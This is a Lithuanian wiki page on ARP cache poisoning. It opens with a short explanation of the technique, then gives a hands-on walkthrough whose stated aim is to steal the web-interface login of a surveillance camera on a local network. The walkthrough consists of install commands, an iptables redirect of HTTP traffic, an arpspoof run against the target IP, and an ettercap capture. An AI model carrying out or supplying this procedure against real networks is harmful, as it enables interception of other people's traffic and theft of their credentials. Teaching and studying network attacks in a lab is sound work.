ARP Poisoning

Iš Žinynas.
08:51, 3 rugpjūčio 2017 versija, sukurta \dev\null (Aptarimas | indėlis)
(skirt) ← Ankstesnė versija | Dabartinė versija (skirt) | Vėlesnė versija → (skirt)
Jump to navigation Jump to search

Kompiuteriniuose tinkluose, ARP spoofing, ARP cache poisoning ar ARP poison (nuodyjimas), ARP poison routing - meistriška technika, kurią pasitelkus įsibrovėlis siunčia netikras (spoofed) ARP (Address Resolution Protocol) žinutes į lokalų tinklą. Ši technika veikia taip: įsibrovėlio MAC adresas susiejamas su IP adresu kito hosto, pvz išeities šliuzo (gateway). Visas srautas skirtas tam IP adresui keliauja pas įsibrovėlį.

ARP spoofingas leidžia įsibrovėlui nukreipti į save visą aukos srautą, tokiu atveju įsibrovėlis gali stebėti srautą, keisti srautą, užrausti jį arba pasinaudoti viena iš kitų būdingų atakų pvz.: Denial Of Service, Man In The Middle arba sesijos perėmimo (session hijacking) ataka.

Ataka veiksminga tiktai tinkluose kuriuose naudojamas ARP (Address Resolution protokolas) ir apsiriboja veikimu tiktai lokalaus tinklo segmentuose.

Intro[keisti]

Tikslas: gauti stebėjimo kameros esancios tinkle, web interfeiso prisijungimus (username, password) ip: 192.168.1.51

  • Tinklo konfiguracija:
  • subnet: 255.255.255.0
  • router: 192.168.1.1

Diegimas[keisti]

Susidedam tinklo irankius

apt-get install build-essential ettercap
git clone https://github.com/smikims/arpspoof.git 
cd arpspoof
make

Panaudojimas[keisti]

Redirektinam 80 (http) porto srauta i 1024 porta

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024

Nustatom arpspoof

./arpspoof -i eth0 192.168.1.51

Gaudom srauta

ettercap -Tq -i eth0 -w capturas

Kai vyksta routerio atsijungimas, arba jeigu turime prisijungimus darome restart. Tuo metu jeigu kas nors jungsis i webcam'a, srautas redirectinisis i musu paketu stebejima. Gauname srauta...